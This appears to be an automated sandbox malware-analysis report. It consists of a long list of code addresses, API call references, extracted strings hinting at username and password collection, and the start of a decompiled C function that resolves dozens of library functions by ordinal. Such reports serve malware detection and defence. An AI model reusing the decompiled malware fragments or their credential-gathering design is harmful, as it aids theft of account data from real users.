                                                                                                                              0x0040aaaa
                                                                                                                              0x0040aaae
                                                                                                                              0x0040aab2
                                                                                                                              0x0040aab9
                                                                                                                              0x0040aab9
                                                                                                                              0x0040aab4
                                                                                                                              0x0040aab4
                                                                                                                              0x0040aab4
                                                                                                                              0x0040aabf
                                                                                                                              0x0040aac4
                                                                                                                              0x0040aac9
                                                                                                                              0x0040aad2
                                                                                                                              0x0040aadf
                                                                                                                              0x0040aae1
                                                                                                                              0x0040aae3
                                                                                                                              0x0040aaeb
                                                                                                                              0x0040ab02
                                                                                                                              0x0040ab02
                                                                                                                              0x0040aaed
                                                                                                                              0x0040aaed
                                                                                                                              0x0040aaf0
                                                                                                                              0x0040aafa
                                                                                                                              0x0040aafa
                                                                                                                              0x0040aafd
                                                                                                                              0x0040aafd
                                                                                                                              0x0040ab04
                                                                                                                              0x0040ab05
                                                                                                                              0x0040ab09
                                                                                                                              0x0040ab14
                                                                                                                              0x0040ab15
                                                                                                                              0x0040ab1a
                                                                                                                              0x0040ab1e
                                                                                                                              0x0040ab20
                                                                                                                              0x0040ab28
                                                                                                                              0x0040ab2a
                                                                                                                              0x0040ab30
                                                                                                                              0x0040ab36
                                                                                                                              0x0040ab38
                                                                                                                              0x0040ab3a
                                                                                                                              0x0040ab3c
                                                                                                                              0x0040ab3e
                                                                                                                              0x0040ab40
                                                                                                                              0x0040ab42
                                                                                                                              0x0040ab45
                                                                                                                              0x0040ab45
                                                                                                                              0x0040ab4b
                                                                                                                              0x0040ab4e
                                                                                                                              0x0040ab50
                                                                                                                              0x0040ab52
                                                                                                                              0x0040ab53
                                                                                                                              0x0040ab58
                                                                                                                              0x0040ab58
                                                                                                                              0x0040ab5b
                                                                                                                              0x0040ab5c
                                                                                                                              0x0040ab61
                                                                                                                              0x0040ab61
                                                                                                                              0x0040ab3c
                                                                                                                              0x0040ab64
                                                                                                                              0x0040ab64
                                                                                                                              0x0040ab68
                                                                                                                              0x0040ab6b
                                                                                                                              0x00000000
                                                                                                                              0x0040ab6b
                                                                                                                              0x00000000
                                                                                                                              0x0040aaa0
                                                                                                                              0x0040aa84
                                                                                                                              0x0040ab79
                                                                                                                              0x0040ab7e
                                                                                                                              0x0040ab87
                                                                                                                              0x0040ab8f
                                                                                                                              0x0040ab94
                                                                                                                              0x0040ab98
                                                                                                                              0x0040ab9a
                                                                                                                              0x0040aba2
                                                                                                                              0x0040aba4
                                                                                                                              0x0040abaa
                                                                                                                              0x0040abb0
                                                                                                                              0x0040abb2
                                                                                                                              0x0040abb4
                                                                                                                              0x0040abb6
                                                                                                                              0x0040abb8
                                                                                                                              0x0040abba
                                                                                                                              0x0040abbc
                                                                                                                              0x0040abbf
                                                                                                                              0x0040abbf
                                                                                                                              0x0040abc5
                                                                                                                              0x0040abc8
                                                                                                                              0x0040abca
                                                                                                                              0x0040abcc
                                                                                                                              0x0040abcd
                                                                                                                              0x0040abd2
                                                                                                                              0x0040abd2
                                                                                                                              0x0040abd5
                                                                                                                              0x0040abd6
                                                                                                                              0x0040abdb
                                                                                                                              0x0040abdb
                                                                                                                              0x0040abb6
                                                                                                                              0x0040abb2
                                                                                                                              0x0040abe3
                                                                                                                              0x0040abe6
                                                                                                                              0x0040abec
                                                                                                                              0x0040abf0
                                                                                                                              0x0040abf2
                                                                                                                              0x0040abf4
                                                                                                                              0x0040abfa
                                                                                                                              0x0040abfc
                                                                                                                              0x0040abfc
                                                                                                                              0x0040abfe
                                                                                                                              0x0040abfe
                                                                                                                              0x0040ac02
                                                                                                                              0x0040ac06
                                                                                                                              0x0040ac08
                                                                                                                              0x0040ac0a
                                                                                                                              0x0040ac10
                                                                                                                              0x0040ac12
                                                                                                                              0x0040ac16
                                                                                                                              0x0040ac16
                                                                                                                              0x0040ac18
                                                                                                                              0x0040ac18
                                                                                                                              0x0040ac1c
                                                                                                                              0x0040ac1e
                                                                                                                              0x0040ac26
                                                                                                                              0x0040ac28
                                                                                                                              0x0040ac2a
                                                                                                                              0x0040ac2e
                                                                                                                              0x0040ac30
                                                                                                                              0x0040ac30
                                                                                                                              0x0040ac34
                                                                                                                              0x0040ac36
                                                                                                                              0x0040ac3e
                                                                                                                              0x0040ac46
                                                                                                                              0x0040ac46
                                                                                                                              0x0040ac4d
                                                                                                                              0x0040ac51
                                                                                                                              0x0040ac53
                                                                                                                              0x0040ac57
                                                                                                                              0x0040ac58
                                                                                                                              0x0040ac5d
                                                                                                                              0x0040ac5d
                                                                                                                              0x0040ac60
                                                                                                                              0x0040ac64
                                                                                                                              0x0040ac6c
                                                                                                                              0x0040ac70
                                                                                                                              0x0040ac75
                                                                                                                              0x0040ac7b
                                                                                                                              0x0040ac7c
                                                                                                                              0x0040ac81
                                                                                                                              0x0040ac81
                                                                                                                              0x0040ac8b
                                                                                                                              0x0040ac93
                                                                                                                              0x0040ac94
                                                                                                                              0x0040ac96
                                                                                                                              0x0040ac9e
                                                                                                                              0x0040acab
                                                                                                                              0x0040acab
                                                                                                                              0x0040a130
                                                                                                                              0x0040a134
                                                                                                                              0x0040a138
                                                                                                                              0x0040a139
                                                                                                                              0x0040a13a
                                                                                                                              0x0040a141
                                                                                                                              0x0040a143
                                                                                                                              0x0040a147
                                                                                                                              0x0040a149
                                                                                                                              0x0040a14d
                                                                                                                              0x0040a155
                                                                                                                              0x0040a155
                                                                                                                              0x0040a15a
                                                                                                                              0x0040a15f
                                                                                                                              0x0040a163
                                                                                                                              0x0040a171
                                                                                                                              0x0040a173
                                                                                                                              0x0040a176
                                                                                                                              0x0040a178
                                                                                                                              0x0040a193
                                                                                                                              0x0040a193
                                                                                                                              0x00000000
                                                                                                                              0x0040a17a
                                                                                                                              0x0040a17d
                                                                                                                              0x0040a186
                                                                                                                              0x0040a18f
                                                                                                                              0x0040a191
                                                                                                                              0x0040a198
                                                                                                                              0x0040a1a0
                                                                                                                              0x0040a1a4
                                                                                                                              0x0040a1a9
                                                                                                                              0x0040a1ae
                                                                                                                              0x0040a1b7
                                                                                                                              0x0040a1c4
                                                                                                                              0x0040a1c8
                                                                                                                              0x0040a1ca
                                                                                                                              0x0040a1d2
                                                                                                                              0x0040a1e9
                                                                                                                              0x0040a1e9
                                                                                                                              0x0040a1d4
                                                                                                                              0x0040a1d4
                                                                                                                              0x0040a1d7
                                                                                                                              0x0040a1e1
                                                                                                                              0x0040a1e1
                                                                                                                              0x0040a1e4
                                                                                                                              0x0040a1e4
                                                                                                                              0x0040a1eb
                                                                                                                              0x0040a1f0
                                                                                                                              0x0040a1f1
                                                                                                                              0x0040a1f9
                                                                                                                              0x0040a1fc
                                                                                                                              0x0040a201
                                                                                                                              0x0040a205
                                                                                                                              0x0040a207
                                                                                                                              0x0040a20f
                                                                                                                              0x0040a211
                                                                                                                              0x0040a217
                                                                                                                              0x0040a21d
                                                                                                                              0x0040a21f
                                                                                                                              0x0040a221
                                                                                                                              0x0040a223
                                                                                                                              0x0040a225
                                                                                                                              0x0040a227
                                                                                                                              0x0040a229
                                                                                                                              0x0040a22c
                                                                                                                              0x0040a22c
                                                                                                                              0x0040a232
                                                                                                                              0x0040a235
                                                                                                                              0x0040a237
                                                                                                                              0x0040a239
                                                                                                                              0x0040a23a
                                                                                                                              0x0040a23f
                                                                                                                              0x0040a23f
                                                                                                                              0x0040a242
                                                                                                                              0x0040a243
                                                                                                                              0x0040a248
                                                                                                                              0x0040a248
                                                                                                                              0x0040a223
                                                                                                                              0x0040a24b
                                                                                                                              0x0040a24b
                                                                                                                              0x0040a24f
                                                                                                                              0x0040a252
                                                                                                                              0x0040a254
                                                                                                                              0x0040a26f
                                                                                                                              0x0040a26f
                                                                                                                              0x00000000
                                                                                                                              0x0040a256
                                                                                                                              0x0040a259
                                                                                                                              0x0040a262
                                                                                                                              0x0040a26b
                                                                                                                              0x0040a26d
                                                                                                                              0x0040a274
                                                                                                                              0x0040a274
                                                                                                                              0x0040a277
                                                                                                                              0x0040a27b
                                                                                                                              0x0040a27f
                                                                                                                              0x0040a2ac
                                                                                                                              0x0040a2b1
                                                                                                                              0x0040a2b4
                                                                                                                              0x0040a2b9
                                                                                                                              0x0040a2be
                                                                                                                              0x0040a2c7
                                                                                                                              0x0040a2d4
                                                                                                                              0x0040a2d6
                                                                                                                              0x0040a2d8
                                                                                                                              0x0040a2e0
                                                                                                                              0x0040a2f7
                                                                                                                              0x0040a2f7
                                                                                                                              0x0040a2e2
                                                                                                                              0x0040a2e2
                                                                                                                              0x0040a2e5
                                                                                                                              0x0040a2ef
                                                                                                                              0x0040a2ef
                                                                                                                              0x0040a2f2
                                                                                                                              0x0040a2f2
                                                                                                                              0x0040a2f9
                                                                                                                              0x0040a2fe
                                                                                                                              0x0040a2ff
                                                                                                                              0x0040a307
                                                                                                                              0x0040a30a
                                                                                                                              0x0040a30f
                                                                                                                              0x0040a313
                                                                                                                              0x0040a315
                                                                                                                              0x0040a31d
                                                                                                                              0x0040a31f
                                                                                                                              0x0040a325
                                                                                                                              0x0040a32b
                                                                                                                              0x0040a32d
                                                                                                                              0x0040a32f
                                                                                                                              0x0040a331
                                                                                                                              0x0040a333
                                                                                                                              0x0040a335
                                                                                                                              0x0040a337
                                                                                                                              0x0040a33a
                                                                                                                              0x0040a33a
                                                                                                                              0x0040a340
                                                                                                                              0x0040a343
                                                                                                                              0x0040a345
                                                                                                                              0x0040a347
                                                                                                                              0x0040a348
                                                                                                                              0x0040a34d
                                                                                                                              0x0040a34d
                                                                                                                              0x0040a350
                                                                                                                              0x0040a351
                                                                                                                              0x0040a356
                                                                                                                              0x0040a356
                                                                                                                              0x0040a331
                                                                                                                              0x0040a359
                                                                                                                              0x0040a359
                                                                                                                              0x0040a35d
                                                                                                                              0x0040a360
                                                                                                                              0x0040a362
                                                                                                                              0x0040a37d
                                                                                                                              0x0040a37d
                                                                                                                              0x00000000
                                                                                                                              0x0040a364
                                                                                                                              0x0040a367
                                                                                                                              0x0040a370
                                                                                                                              0x0040a379
                                                                                                                              0x0040a37b
                                                                                                                              0x0040a382
                                                                                                                              0x0040a382
                                                                                                                              0x0040a385
                                                                                                                              0x0040a389
                                                                                                                              0x0040a38d
                                                                                                                              0x0040a496
                                                                                                                              0x0040a49f
                                                                                                                              0x0040a4a4
                                                                                                                              0x0040a4ad
                                                                                                                              0x0040a4ba
                                                                                                                              0x0040a4bc
                                                                                                                              0x0040a4be
                                                                                                                              0x0040a4c6
                                                                                                                              0x0040a4dd
                                                                                                                              0x0040a4dd
                                                                                                                              0x0040a4c8
                                                                                                                              0x0040a4c8
                                                                                                                              0x0040a4cb
                                                                                                                              0x0040a4cd
                                                                                                                              0x0040a4d5
                                                                                                                              0x0040a4d5
                                                                                                                              0x0040a4d8
                                                                                                                              0x0040a4d8
                                                                                                                              0x0040a4df
                                                                                                                              0x0040a4e4
                                                                                                                              0x0040a4ef
                                                                                                                              0x0040a4f0
                                                                                                                              0x0040a4f5
                                                                                                                              0x0040a4f9
                                                                                                                              0x0040a4fb
                                                                                                                              0x0040a503
                                                                                                                              0x0040a505
                                                                                                                              0x0040a50b
                                                                                                                              0x0040a511
                                                                                                                              0x0040a513
                                                                                                                              0x0040a515
                                                                                                                              0x0040a517
                                                                                                                              0x0040a519
                                                                                                                              0x0040a51b
                                                                                                                              0x0040a51d
                                                                                                                              0x0040a520
                                                                                                                              0x0040a520
                                                                                                                              0x0040a526
                                                                                                                              0x0040a529
                                                                                                                              0x0040a52b
                                                                                                                              0x0040a52d
                                                                                                                              0x0040a52e
                                                                                                                              0x0040a533
                                                                                                                              0x0040a533
                                                                                                                              0x0040a536
                                                                                                                              0x0040a537
                                                                                                                              0x0040a53c
                                                                                                                              0x0040a53c
                                                                                                                              0x0040a517
                                                                                                                              0x0040a53f
                                                                                                                              0x0040a53f
                                                                                                                              0x00000000
                                                                                                                              0x0040a503
                                                                                                                              0x0040a393
                                                                                                                              0x0040a395
                                                                                                                              0x0040a3b0
                                                                                                                              0x0040a3b0
                                                                                                                              0x0040a3b5
                                                                                                                              0x0040a3d3
                                                                                                                              0x0040a3d8
                                                                                                                              0x0040a3db
                                                                                                                              0x0040a3e1
                                                                                                                              0x0040a3e6
                                                                                                                              0x0040a3f4
                                                                                                                              0x0040a401
                                                                                                                              0x0040a403
                                                                                                                              0x0040a405
                                                                                                                              0x0040a40d
                                                                                                                              0x0040a424
                                                                                                                              0x0040a424
                                                                                                                              0x0040a40f
                                                                                                                              0x0040a40f
                                                                                                                              0x0040a412
                                                                                                                              0x0040a41c
                                                                                                                              0x0040a41c
                                                                                                                              0x0040a41f
                                                                                                                              0x0040a41f
                                                                                                                              0x0040a426
                                                                                                                              0x0040a42b
                                                                                                                              0x0040a42c
                                                                                                                              0x0040a437
                                                                                                                              0x0040a43c
                                                                                                                              0x0040a440
                                                                                                                              0x0040a442
                                                                                                                              0x0040a44a
                                                                                                                              0x0040a450
                                                                                                                              0x0040a456
                                                                                                                              0x0040a45c
                                                                                                                              0x0040a45e
                                                                                                                              0x0040a460
                                                                                                                              0x0040a462
                                                                                                                              0x0040a464
                                                                                                                              0x0040a466
                                                                                                                              0x0040a468
                                                                                                                              0x0040a46b
                                                                                                                              0x0040a46b
                                                                                                                              0x0040a471
                                                                                                                              0x0040a474
                                                                                                                              0x0040a476
                                                                                                                              0x0040a478
                                                                                                                              0x0040a479
                                                                                                                              0x0040a47e
                                                                                                                              0x0040a47e
                                                                                                                              0x0040a481
                                                                                                                              0x0040a482
                                                                                                                              0x0040a487
                                                                                                                              0x0040a487
                                                                                                                              0x0040a462
                                                                                                                              0x0040a48a
                                                                                                                              0x0040a48a
                                                                                                                              0x00000000
                                                                                                                              0x0040a44a
                                                                                                                              0x0040a3a3
                                                                                                                              0x0040a3ac
                                                                                                                              0x0040a3ae
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040a3ae
                                                                                                                              0x00000000
                                                                                                                              0x0040a37b
                                                                                                                              0x0040a362
                                                                                                                              0x0040a281
                                                                                                                              0x0040a283
                                                                                                                              0x0040a29e
                                                                                                                              0x0040a29e
                                                                                                                              0x0040a2a3
                                                                                                                              0x0040a2a3
                                                                                                                              0x0040a2a6
                                                                                                                              0x00000000
                                                                                                                              0x0040a2a6
                                                                                                                              0x0040a288
                                                                                                                              0x0040a291
                                                                                                                              0x0040a29a
                                                                                                                              0x0040a29c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040a29c
                                                                                                                              0x00000000
                                                                                                                              0x0040a26d
                                                                                                                              0x0040a254
                                                                                                                              0x00000000
                                                                                                                              0x0040a191
                                                                                                                              0x0040a543
                                                                                                                              0x0040a543
                                                                                                                              0x0040a548
                                                                                                                              0x0040a54a
                                                                                                                              0x0040a54d
                                                                                                                              0x0040a552
                                                                                                                              0x0040a552
                                                                                                                              0x00000000
                                                                                                                              0x0040a134
                                                                                                                              0x00409f1a
                                                                                                                              0x00409f1d
                                                                                                                              0x00409f26
                                                                                                                              0x00409f2e
                                                                                                                              0x00409f37
                                                                                                                              0x00409f3f
                                                                                                                              0x00409f44
                                                                                                                              0x00409f4d
                                                                                                                              0x00409f55
                                                                                                                              0x00409f5a
                                                                                                                              0x00409f62
                                                                                                                              0x00409f6c
                                                                                                                              0x00409f6d
                                                                                                                              0x00409f72
                                                                                                                              0x00409f76
                                                                                                                              0x00409f78
                                                                                                                              0x00409f80
                                                                                                                              0x00409f82
                                                                                                                              0x00409f88
                                                                                                                              0x00409f8e
                                                                                                                              0x00409f90
                                                                                                                              0x00409f92
                                                                                                                              0x00409f94
                                                                                                                              0x00409f96
                                                                                                                              0x00409f98
                                                                                                                              0x00409f9a
                                                                                                                              0x00409f9d
                                                                                                                              0x00409f9d
                                                                                                                              0x00409fa3
                                                                                                                              0x00409fa6
                                                                                                                              0x00409fa8
                                                                                                                              0x00409faa
                                                                                                                              0x00409fab
                                                                                                                              0x00409fb0
                                                                                                                              0x00409fb0
                                                                                                                              0x00409fb3
                                                                                                                              0x00409fb4
                                                                                                                              0x00409fb9
                                                                                                                              0x00409fb9
                                                                                                                              0x00409f94
                                                                                                                              0x00409fbc
                                                                                                                              0x00409fbc
                                                                                                                              0x00409fc4
                                                                                                                              0x00409fc6
                                                                                                                              0x00409fc9
                                                                                                                              0x00409fce
                                                                                                                              0x00409fce
                                                                                                                              0x00000000
                                                                                                                              0x00409b70
                                                                                                                              0x00409b70
                                                                                                                              0x00409b73
                                                                                                                              0x00409b79
                                                                                                                              0x00000000
                                                                                                                              0x00409b7b
                                                                                                                              0x00409b85
                                                                                                                              0x00409b97
                                                                                                                              0x00409b9e
                                                                                                                              0x00409baa
                                                                                                                              0x00409bae
                                                                                                                              0x00409bb8
                                                                                                                              0x00409bbc
                                                                                                                              0x00409bc4
                                                                                                                              0x00409bc6
                                                                                                                              0x00409bc6
                                                                                                                              0x00409bcb
                                                                                                                              0x00409bd0
                                                                                                                              0x00409bd3
                                                                                                                              0x00409bd5
                                                                                                                              0x00409bd7
                                                                                                                              0x00409bd7
                                                                                                                              0x00409bdc
                                                                                                                              0x00409bde
                                                                                                                              0x00409be3
                                                                                                                              0x00409be6
                                                                                                                              0x00409bec
                                                                                                                              0x00409bf4
                                                                                                                              0x00409bff
                                                                                                                              0x00409bff
                                                                                                                              0x00409bf6
                                                                                                                              0x00409bf6
                                                                                                                              0x00409bf8
                                                                                                                              0x00409bf8
                                                                                                                              0x00409c04
                                                                                                                              0x00409c0d
                                                                                                                              0x00409c15
                                                                                                                              0x00409c18
                                                                                                                              0x00409c1d
                                                                                                                              0x00409c27
                                                                                                                              0x00409c35
                                                                                                                              0x00409c35
                                                                                                                              0x00409c3b
                                                                                                                              0x00409c42
                                                                                                                              0x00409c4b
                                                                                                                              0x00409c53
                                                                                                                              0x00409c5b
                                                                                                                              0x00409c64
                                                                                                                              0x00409c6c
                                                                                                                              0x00409c71
                                                                                                                              0x00409c7a
                                                                                                                              0x00409c82
                                                                                                                              0x00409c87
                                                                                                                              0x00409c8f
                                                                                                                              0x00409c97
                                                                                                                              0x00409c9a
                                                                                                                              0x00409c9b
                                                                                                                              0x00409ca0
                                                                                                                              0x00409ca6
                                                                                                                              0x00409cac
                                                                                                                              0x00409cb4
                                                                                                                              0x00409cb6
                                                                                                                              0x00409cc0
                                                                                                                              0x00409cc6
                                                                                                                              0x00409cca
                                                                                                                              0x00409ccd
                                                                                                                              0x00409ccd
                                                                                                                              0x00409cd3
                                                                                                                              0x00409cd6
                                                                                                                              0x00409cd8
                                                                                                                              0x00409cda
                                                                                                                              0x00409cdb
                                                                                                                              0x00409ce0
                                                                                                                              0x00409ce0
                                                                                                                              0x00409ce3
                                                                                                                              0x00409ce4
                                                                                                                              0x00409ce9
                                                                                                                              0x00409ce9
                                                                                                                              0x00409cc0
                                                                                                                              0x00000000
                                                                                                                              0x00409cb4

                                                                                                                              APIs
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00409CBC
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00409CCD
                                                                                                                                • Part of subcall function 00408FB0: SysAllocString.OLEAUT32(?), ref: 00409005
                                                                                                                                • Part of subcall function 00413190: SysStringLen.OLEAUT32(?), ref: 004131F6
                                                                                                                                • Part of subcall function 00413190: SysStringLen.OLEAUT32(00000000), ref: 00413213
                                                                                                                                • Part of subcall function 00413190: InterlockedDecrement.KERNEL32(?), ref: 0041329C
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00409D5B
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00409D6C
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00409DFA
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00409E0B
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00409EC7
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00409EDC
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00409F88
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00409F9D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: String$DecrementInterlocked$Free$Alloc
                                                                                                                              • String ID: //init_data$//init_data//autodetected$//init_data//autodetected/*$//init_data//excluded$//init_data//excluded/*$//init_data//useradded$//init_data//useradded/*$1$7$8$Cant do CreateXMLFile$D$C$D$C$autodetected$computer$excluded$init_data$name$password$useradded$username
                                                                                                                              • API String ID: 313304687-1509616953
                                                                                                                              • Opcode ID: 0d8d54edc302de171396370abfa106c3ee66e685673bb4790060a1bf4c09822e
                                                                                                                              • Instruction ID: 31892945a201b75b4ea7ba9375400198c417368dcc0db6fa1376e08e3d248779
                                                                                                                              • Opcode Fuzzy Hash: 0d8d54edc302de171396370abfa106c3ee66e685673bb4790060a1bf4c09822e
                                                                                                                              • Instruction Fuzzy Hash: 1DB2D1B12083419BC724EF69C985A5FB7E5AB84304F54892EF485D7381DF78E844CBAB
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040EBD0 Relevance: 70.9, APIs: 47, Instructions: 410libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E0040EBD0(signed int __ecx) {
				struct HINSTANCE__* _t192;
				_Unknown_base(*)()* _t193;
				_Unknown_base(*)()* _t195;
				signed int _t196;
				_Unknown_base(*)()* _t198;
				_Unknown_base(*)()* _t200;
				signed int _t201;
				_Unknown_base(*)()* _t203;
				_Unknown_base(*)()* _t205;
				signed int _t206;
				_Unknown_base(*)()* _t208;
				_Unknown_base(*)()* _t210;
				signed int _t211;
				_Unknown_base(*)()* _t213;
				_Unknown_base(*)()* _t215;
				signed int _t216;
				_Unknown_base(*)()* _t218;
				_Unknown_base(*)()* _t220;
				signed int _t221;
				_Unknown_base(*)()* _t223;
				_Unknown_base(*)()* _t225;
				signed int _t226;
				_Unknown_base(*)()* _t228;
				_Unknown_base(*)()* _t230;
				signed int _t231;
				_Unknown_base(*)()* _t233;
				_Unknown_base(*)()* _t235;
				signed int _t236;
				_Unknown_base(*)()* _t238;
				_Unknown_base(*)()* _t240;
				signed int _t241;
				_Unknown_base(*)()* _t243;
				_Unknown_base(*)()* _t245;
				signed int _t246;
				_Unknown_base(*)()* _t248;
				_Unknown_base(*)()* _t250;
				signed int _t251;
				_Unknown_base(*)()* _t253;
				_Unknown_base(*)()* _t255;
				signed int _t256;
				_Unknown_base(*)()* _t258;
				_Unknown_base(*)()* _t260;
				signed int _t261;
				_Unknown_base(*)()* _t263;
				_Unknown_base(*)()* _t265;
				signed int _t266;
				_Unknown_base(*)()* _t268;
				_Unknown_base(*)()* _t270;
				_Unknown_base(*)()* _t272;
				signed int _t276;
				signed char _t324;
				signed int _t328;
				struct HINSTANCE__* _t330;
				struct HINSTANCE__* _t332;
				struct HINSTANCE__* _t334;
				struct HINSTANCE__* _t336;
				struct HINSTANCE__* _t338;
				struct HINSTANCE__* _t340;
				struct HINSTANCE__* _t342;
				struct HINSTANCE__* _t344;
				struct HINSTANCE__* _t346;
				struct HINSTANCE__* _t348;
				struct HINSTANCE__* _t350;
				struct HINSTANCE__* _t352;
				struct HINSTANCE__* _t354;
				struct HINSTANCE__* _t356;
				struct HINSTANCE__* _t358;
				struct HINSTANCE__* _t361;
				struct HINSTANCE__* _t363;
				struct HINSTANCE__* _t365;
				struct HINSTANCE__* _t367;
				struct HINSTANCE__* _t369;
				struct HINSTANCE__* _t371;
				struct HINSTANCE__* _t373;
				struct HINSTANCE__* _t375;
				struct HINSTANCE__* _t377;
				struct HINSTANCE__* _t379;
				struct HINSTANCE__* _t381;
				struct HINSTANCE__* _t383;
				struct HINSTANCE__* _t385;
				struct HINSTANCE__* _t387;
				struct HINSTANCE__* _t389;
				signed int _t396;

				_t328 = __ecx;
				_t396 = __ecx;
				_t192 = 4[__ecx];
				if(_t192 != 0) {
					_push(_t276);
					_t193 = GetProcAddress(_t192, 1);
					 *(_t396 + 0x1c) = _t193;
					_t195 = GetProcAddress( *(_t396 + 4), 2);
					_t361 =  *(_t396 + 4);
					 *(_t396 + 0x20) = _t195;
					_t196 = GetProcAddress(_t361, 0x12);
					_t330 =  *(_t396 + 4);
					 *(_t396 + 0x24) = _t196;
					_t198 = GetProcAddress(_t330, 0x13);
					 *(_t396 + 0x28) = _t198;
					_t200 = GetProcAddress( *(_t396 + 4), 0x14);
					_t363 =  *(_t396 + 4);
					 *(_t396 + 0x2c) = _t200;
					_t201 = GetProcAddress(_t363, 0x15);
					_t332 =  *(_t396 + 4);
					 *(_t396 + 0x30) = _t201;
					_t203 = GetProcAddress(_t332, 3);
					 *(_t396 + 0x34) = _t203;
					_t205 = GetProcAddress( *(_t396 + 4), 4);
					_t365 =  *(_t396 + 4);
					 *(_t396 + 0x38) = _t205;
					_t206 = GetProcAddress(_t365, 5);
					_t334 =  *(_t396 + 4);
					 *(_t396 + 0x3c) = _t206;
					_t208 = GetProcAddress(_t334, 6);
					 *(_t396 + 0x40) = _t208;
					_t210 = GetProcAddress( *(_t396 + 4), 7);
					_t367 =  *(_t396 + 4);
					 *(_t396 + 0x44) = _t210;
					_t211 = GetProcAddress(_t367, 8);
					_t336 =  *(_t396 + 4);
					 *(_t396 + 0x48) = _t211;
					_t213 = GetProcAddress(_t336, 9);
					 *(_t396 + 0x4c) = _t213;
					_t215 = GetProcAddress( *(_t396 + 4), 0xa);
					_t369 =  *(_t396 + 4);
					 *(_t396 + 0x50) = _t215;
					_t216 = GetProcAddress(_t369, 0xb);
					_t338 =  *(_t396 + 4);
					 *(_t396 + 0x54) = _t216;
					_t218 = GetProcAddress(_t338, 0xc);
					 *(_t396 + 0x58) = _t218;
					_t220 = GetProcAddress( *(_t396 + 4), 0xd);
					_t371 =  *(_t396 + 4);
					 *(_t396 + 0x5c) = _t220;
					_t221 = GetProcAddress(_t371, 0xe);
					_t340 =  *(_t396 + 4);
					 *(_t396 + 0x60) = _t221;
					_t223 = GetProcAddress(_t340, 0xf);
					 *(_t396 + 0x64) = _t223;
					_t225 = GetProcAddress( *(_t396 + 4), 0x10);
					 *(_t396 + 0x68) = _t225;
					_t373 =  *(_t396 + 4);
					_t226 = GetProcAddress(_t373, 0x11);
					_t342 =  *(_t396 + 4);
					 *(_t396 + 0x6c) = _t226;
					_t228 = GetProcAddress(_t342, 0x16);
					 *(_t396 + 0x70) = _t228;
					_t230 = GetProcAddress( *(_t396 + 4), 0x17);
					_t375 =  *(_t396 + 4);
					 *(_t396 + 0x74) = _t230;
					_t231 = GetProcAddress(_t375, 0x18);
					_t344 =  *(_t396 + 4);
					 *(_t396 + 0x78) = _t231;
					_t233 = GetProcAddress(_t344, 0x19);
					 *(_t396 + 0x7c) = _t233;
					_t235 = GetProcAddress( *(_t396 + 4), 0x1a);
					_t377 =  *(_t396 + 4);
					 *(_t396 + 0x80) = _t235;
					_t236 = GetProcAddress(_t377, 0x1c);
					_t346 =  *(_t396 + 4);
					 *(_t396 + 0x84) = _t236;
					_t238 = GetProcAddress(_t346, 0x1b);
					 *(_t396 + 0x88) = _t238;
					_t240 = GetProcAddress( *(_t396 + 4), 0x1d);
					_t379 =  *(_t396 + 4);
					 *(_t396 + 0x8c) = _t240;
					_t241 = GetProcAddress(_t379, 0x1e);
					 *(_t396 + 0x90) = _t241;
					_t348 =  *(_t396 + 4);
					_t243 = GetProcAddress(_t348, 0x1f);
					 *(_t396 + 0x94) = _t243;
					_t245 = GetProcAddress( *(_t396 + 4), 0x20);
					_t381 =  *(_t396 + 4);
					 *(_t396 + 0x98) = _t245;
					_t246 = GetProcAddress(_t381, 0x21);
					_t350 =  *(_t396 + 4);
					 *(_t396 + 0x9c) = _t246;
					_t248 = GetProcAddress(_t350, 0x22);
					 *(_t396 + 0xa0) = _t248;
					_t250 = GetProcAddress( *(_t396 + 4), 0x23);
					_t383 =  *(_t396 + 4);
					 *(_t396 + 0xa4) = _t250;
					_t251 = GetProcAddress(_t383, 0x24);
					_t352 =  *(_t396 + 4);
					 *(_t396 + 0xa8) = _t251;
					_t253 = GetProcAddress(_t352, 0x25);
					 *(_t396 + 0xac) = _t253;
					_t255 = GetProcAddress( *(_t396 + 4), 0x26);
					_t385 =  *(_t396 + 4);
					 *(_t396 + 0xb0) = _t255;
					_t256 = GetProcAddress(_t385, 0x27);
					_t354 =  *(_t396 + 4);
					 *(_t396 + 0xb4) = _t256;
					_t258 = GetProcAddress(_t354, 0x28);
					 *(_t396 + 0xb8) = _t258;
					_t260 = GetProcAddress( *(_t396 + 4), 0x29);
					_t387 =  *(_t396 + 4);
					 *(_t396 + 0xbc) = _t260;
					_t261 = GetProcAddress(_t387, 0x2a);
					_t356 =  *(_t396 + 4);
					 *(_t396 + 0xc0) = _t261;
					_t263 = GetProcAddress(_t356, 0x2b);
					 *(_t396 + 0xc4) = _t263;
					_t265 = GetProcAddress( *(_t396 + 4), 0x2c);
					_t389 =  *(_t396 + 4);
